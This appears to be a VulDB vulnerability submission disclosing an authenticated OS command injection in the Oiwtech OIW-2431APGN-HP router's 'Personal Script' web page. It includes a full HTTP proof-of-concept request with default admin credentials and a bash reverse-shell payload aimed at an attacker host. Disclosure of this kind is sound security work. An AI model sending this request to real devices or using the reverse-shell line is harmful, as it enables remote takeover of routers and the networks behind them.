| Title | Oiwtech OIWTECH-OIW-2431APGN-HP-V2.5.3-B20131128 v2.5.3 Command Injection |
|---|
| Description | In the web management of IWTECH, it is possible to use the "script" menu to obtain a reverse shell, allowing the insertion of commands that will be interpreted by the system.
The vulnerability can be found in the "Management" menu under the "Personal Script" submenu.
This exploitation is carried out after authentication on the web platform.
Vendor: https://oiw.com.br/
request:
POST /boafrm/formScript HTTP/1.1
Host: x.x.x.x:8081
Content-Length: 156
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Language: en-US,en;q=0.9
Origin: http://x.x.x.x:8081
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x:8081/script.htm
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
submit-url=%2Fscript.htm&script=/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1&Save=Aplicar+Altera%E7%F5es
|
|---|
| Source | ⚠️ http://x.x.x.x:8081/home.htm |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 03/06/2025 00:36 (1 Year ago) |
|---|
| Moderation | 03/16/2025 13:19 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 299866 [Oiwtech OIW-2431APGN-HP 2.5.3-B20131128 Personal Script Submenu /boafrm/formScript os command injection] |
|---|
| Points | 17 |
|---|